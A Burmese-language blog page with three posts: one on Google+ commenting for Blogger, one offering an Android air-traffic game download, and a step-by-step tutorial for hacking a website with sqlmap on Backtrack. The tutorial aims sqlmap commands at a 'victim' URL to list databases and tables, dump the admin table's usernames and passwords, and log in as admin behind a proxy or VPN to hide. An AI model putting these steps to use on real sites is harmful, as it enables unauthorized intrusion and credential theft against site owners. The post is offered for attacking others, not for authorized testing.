Wednesday, May 15, 2013

Google+ commenting system ရဲ႕ အေကာင္းႏွင့္အဆိုး

မဂၤလာပါ။ Tech in Blogging မွႀကိဳဆိုပါတယ္။Google+ ကခုလူသံုးမ်ားတဲ့ သတင္းတစ္ခုပါပဲ။ ကြ်န္ေတာ္တုိ႕ ျမန္မာလူမ်ိဳးအမ်ားစုေတြမသံုးၾကေပမယ့္ ႏိုင္ငံျခားမွာ အားလံုးနီးနီးသံုးေနၾကတာကို ကြ်န္ေတာ္တို႕သတိထားမိပါတယ္။ ကြ်န္ေတာ္ကေတာ့ Google+ ကိုခုထက္ထိမေျပာင္းေသးပါ။

Blogger Profile ဟာ တျဖည္းျဖည္းနဲ႕ စေပ်ာက္ကြယ္ျပဳပါၿပီ။ Google+ ကို ဇန္န၀ါရီ ၁၁ရက္ ၂၀၁၂ တြင္မိတ္ဆက္ခဲ့တဲ့ အခ်ိန္ကစၿပီး Blogger user profile ေတြဟာ Google + user profile အျဖစ္ေျပာင္းလဲသြားပါတယ္။  Facebook လိုပဲ social ဆန္လာၿပီး လွတယ္ဆိုေပမယ့္လည္း တခ်ိဳ႕လူေတြက Blogger Profile ကေန Google+ အျဖစ္ေျပာင္းလဲရမွာကို အလြန္ႏွေျမွာမိပါတယ္။ Google + ကေတာ့ Blogging သမားေတြအတြက္ ေက်ာေနာက္ခံျဖစ္လာတာေပါ့။
Spam ကို filter လုပ္ေပးတဲ့ ေကာင္းက်ိဳးပါ။ Spammers ေတြကိုလည္းေၾကာက္ေနစရာမလုိပါဘူး။ ကာလာတုိ႕ ဆိုက္တို႕ လင့္ေတြလည္းေပးလို႕ရပါတယ္။ Backlink မပါဘူး။ သင့္ Blog ရဲ႕ Speed loading ကိုလည္းစိတ္ပူစရာမလိုဘူး။

WordPress မွာေပးတဲ့ automatic စာျပန္တာမ်ဳိး Blogger commenting system မွာလံုး၀မရွိပါ။ OPENID အေကာင့္နဲ႕ Anonymous နဲ႕ Name/URL နဲ႕ spamming လုပ္ေနၾကပါတယ္။
Google+ ဟာ Facebook နဲ႕အၿပိဳင္ေရပန္းစားေနတုန္းပါ။ Google+ ဟာေန႕ခ်င္းညခ်င္း နာမည္ႀကီးပါတယ္ ဘာလို႕လဲဆုိေတာ့ Google ရဲ႕ဌာနတစ္ခုမို႕လို႕ပါ။ Google+ ဟာ ေနရာတိုင္းနီးနီးမွာအသံုး၀င္ေနဆဲပါ။ Gmail အေကာင့္ရွိရင္ Google+ profile ကိုလုပ္ဖို႕မခဲယဥ္းေတာ့ပါဘူး။
+1 ေပးလို႕ရတယ္။ Blogging သမားေတြအတြက္ သတင္းေကာင္းတစ္ခုပါ။ Google+ commenting system ထည့္ရင္ နာမည္မပါတဲ့သူေတြနဲ႕မႀကံဳရေတာ့ပါဘူး။ +1 ေပးဖို႕ပိုမ်ားမယ္။ Google+ သံုးစြဲသူ ပိုမ်ားလာမယ္။ Share လုပ္လုိ႕ရမယ္။ Reply ေတြလာရင္ notifications ေတြမွန္မွန္ေပးပါတယ္။ public ျဖစ္တဲ့ commenting အျဖစ္လည္းသံုးေဆာင္လို႕ရမွာပါ။ Google + profile ရွိရုံနဲ႕ comment ေပးရတာရွယ္ပါပဲ။
Google+ မသံုးတဲ့ user ေတြအတြက္ေတာ့ အခက္အခဲၾကံဳရပါလိမ့္မယ္။ Comments ေတြဟာ domain အသစ္ေျပာင္းတာနဲ႕ အဆင္မေျပေတာ့ပါ။ Stat (comment ေပးသူႏွဳန္း) ေတြမွားေနပါလိမ့္မယ္[ေလာေလာဆယ္ပါ]။ Google+ commenting system ေၾကာင့္သင့္ Blog loading speed ထိခိုက္ပါလိမ့္မယ္။ Google+ commenting system ေၾကာင့္ Blog loading speed မထိခိုက္ေစခ်င္ရင္ http://techinblogging.blogspot.com/2013/04/blogger-site.html မွာဖတ္ပါ။



ref; techinblogging.blogspot.com

ေလယာဥ္ပ်ံထိန္းခ်ဳပ္လိုသူမ်ားအတြက္ Air Control v.3.23 ပါ (Android)


Flight ေတြကို ကိုယ္က Tower ေပၚကေန ဘယ္လမ္းေၾကာင္းကေန ဘယ္လိုင္းကိုဆင္း ဖို႔ ညႊန္ၾကားေပးရ မွာပါ။ လြယ္တယ္ေတာ့ မထင္ပါနဲ႔။ Flight ေတြရဲ႔ အရွိန္နဲ႔ လမ္းေၾကာင္းေပၚမူတည္ျပီး ခ်ိန္ဆရတာ။ ဥာဏ္လည္းသံုးရမယ္။ အခ်ိန္ၾကာလာတဲ့အမွ် Flight ေတြ Helicopter ေတြ ပိုရႈပ္လာမယ္။ ႏိုင္ေအာင္သာ ထိန္းေပေတာ့။

>> Download Air Control v3.23 << (3.41 MB)

Hack website using Backtrack (sqlmap)

ကဲ ေအာက္မွာ ကြ်န္ေတာ္ အဆင့္ေလးေတြနဲ႔ ျပေပးထားပါတယ္ Sqlmap Tool ေလးသံုးၿပီး

Backtrack နဲ႔ Website Hack ရေအာင္ဗ်ာ... ေအာက္က အဆင့္ေတြ အတိုင္း လုပ္ေဆာင္သြားပါ...



1. Backtrack terminal ကိုဖြင့္ၿပီး cd /pentest/database/sqlmap လို႔ရိုက္ၿပီး Enter ႏွိပ္ပါ......
    သင့္ Terminal ထဲမွာ sqlmap ပြင့္သြားပါမည္.....


sql map 1




2. vulnerable site ကိုရွာပါ (ကြ်န္ေတာ့ဆီမွာ အေစာကတည္းက ရွိၿပီးသားပါ)
sql map 2

3. ဒီ Command ကို Terminal ထဲမွာ ရိုက္ၿပီး Enter ႏွိပ္ပါ..(အေပၚပံုကိုၾကည့္ပါ)
python sqlmap.py -u http://yourvictim'slink/index.php?id=4 –dbs


4. Website ရဲ႕ Database Name ကို သင္ရသြားပါလိမ့္မည္.....

sql map 3
    aj နဲ႔ information_schema  ဆုိတာ ႏွစ္ခုကို ကြ်န္ေတာ္ရသြားပါၿပီ

    ကြ်န္ေတာ္ တို႔ အခု aj ကို ေရြးလိုက္ပါ့မယ္


5. ဒီ database 2 ခုရဲ႕ Table ကိုယူပါ..... ဒီလိုလုပ္ဖို႔ ေအာက္က Command ကုိ Terminal  ထဲမွာ ရိုက္ Enter....
python sqlmap.py -u http://yourvictim'slink/index.php?id=4 -D  (database name) –tables


6. aj database က Table ေတြကို ကြ်န္ေတာ္တို႔ ယူပါမယ္..... ေအာက္က Command ေလးရိုက္ေလးလိုက္

    ပါဦး.......
python sqlmap.py -u http://www.yourvictim'slink.com/index.php?id=4 -D aj –tables

sql map 4



7. aj databas ထဲမွာ သိမ္းထားတဲ႔ Table list ကို သင္ရသြားပါလိမ့္မယ္ ေအာက္ပံုကိုၾကည့္ပါ

sql map 5



8. admin table ထဲက Column ေတြကို ယူပါမယ္ .... ေအာက္မွာ Command ရိုက္ပါ
python sqlmap.py -u http://www.yourvictim'slink.com/index.php?id=4 -T admin --columns
sql map 7
     Column ေတြထဲမွာ ကြ်န္ေတာ္တို႔ Username နဲ႔ Password ကိုျမင္ရပါၿပီ

9. Admin Password ကို ယူရေအာင္ဗ်ာ... ေအာက္မွာ Command ရိုက္ပါ..
python sqlmap.py -u http://www.yourvictim'slink.com/index.php?id=4 -T admin -U test --dump
Website ရဲ႕ Username နဲ႔ Password ကို ရၿပီဗ်ိဳ႕ ထသာကေပေတာ့ !
sql map 9
   
Website ထဲကို သင္ Admin အျဖစ္နဲ႔ ဝင္ေတာ့မည္ ဆုိလွ်င္   Website ရဲ႕ Admin Panel ကိုရွာၿပီး proxy/vpn သံုးပါ

REF: HackForSec

FB comments